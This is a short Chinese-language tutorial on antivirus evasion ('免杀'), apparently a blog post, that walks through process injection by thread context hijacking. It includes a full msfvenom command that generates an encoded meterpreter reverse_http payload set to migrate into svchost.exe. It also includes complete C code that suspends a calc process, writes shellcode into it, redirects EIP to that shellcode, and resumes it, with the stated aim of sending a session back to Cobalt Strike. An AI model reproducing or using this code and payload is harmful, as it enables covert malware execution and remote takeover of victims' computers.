效果图
免杀时间:2021-10-24
关键API SetThreadContext指向EIP位置
流程
1. 创建进程
2. 挂起进程
3. 分配写入shellcode
4. 更改EIP指针指向shellcode
5. 恢复挂起,成功运行Shellcode
EIP寄存器,存储CPU要读取指令的地址,CPU通过EIP寄存器读取即将要执行的指令。每次CPU执行完相应的汇编指令之后,EIP寄存器的值就会增加
生成Shellcode Payload
在MsF生成ShellCode,上线到Cs,模块:windows/meterpreter/reverse_http
msfvenom -p windows/meterpreter/reverse_http LHOST=127.0.0.1 LPORT=87 -e x86/shikata_ga_nai -i 5 -b \\x00\\ PrependMigrate=true PrependMigrateProc=svchost.exe -f c -o Payload.c
PrependMigrate=true PrependMigrateProc=svchost.exe该选项会将Shell迁移到svchost.exe进程
实现代码
#include <Windows.h>
//弹出计算器ShellCode
unsigned char shellcode[] = "\x55\x8B\xEC\x83\xEC\x20\x64\xA1\x30\x00\x00\x00\x8B\x40\x0C\x8B\x40\x1C\x8B\x00\x8B\x00\x8B\x40\x08\xC7\x45\xFC\x00\x00\x00\x00\xC7\x45\xF8\x00\x00\x00\x00\xC7\x45\xF4\x00\x00\x00\x00\x8B\x58\x3C\x8D\x1C\x18\x8B\x5B\x78\x8D\x14\x18\x8B\x5A\x1C\x8D\x1C\x18\x89\x5D\xFC\x8B\x5A\x20\x8D\x1C\x18\x89\x5D\xF8\x8B\x5A\x24\x8D\x1C\x18\x89\x5D\xF4\x8B\x7A\x18\x33\xC9\x8B\x75\xF8\x8B\x1C\x8E\x8D\x1C\x18\x8B\x1B\x81\xFB\x57\x69\x6E\x45\x74\x03\x41\xEB\xED\x8B\x5D\xF4\x33\xD2\x66\x8B\x14\x4B\x8B\x5D\xFC\x8B\x1C\x93\x8D\x04\x18\xEB\x09\x63\x61\x6C\x63\x2E\x65\x78\x65\x00\xE8\x00\x00\x00\x00\x5B\x83\xEB\x0E\x6A\x05\x53\xFF\xD0\x8B\xE5\x5D\xC3";
int main(int argc, char const *argv[])
{
STARTUPINFOA si = { 0 };
si.cb = sizeof(si);
PROCESS_INFORMATION pi = {0};
CreateProcessA(NULL, (LPSTR)"calc", NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
SuspendThread(pi.hThread);
LPVOID lpBuffer = VirtualAllocEx(pi.hProcess, NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, lpBuffer, shellcode, sizeof(shellcode), NULL);
CONTEXT ctx = { 0 };
ctx.ContextFlags = CONTEXT_FULL;
GetThreadContext(pi.hThread, &ctx);
ctx.Eip = (DWORD64)lpBuffer;
SetThreadContext(pi.hThread, &ctx);
ResumeThread(pi.hThread);
Sleep(800);
DWORD CodeExit;
TerminateThread(pi.hThread,GetExitCodeThread(pi.hThread,&CodeExit));
return 0;
}执行流程
创建一个计算器进程,挂起进程,注入Shellcode到calc计算机,恢复挂起,执行shellcode,最后迁移Shell到svchost.exe进程,结束calc线程,成功上线到Cs
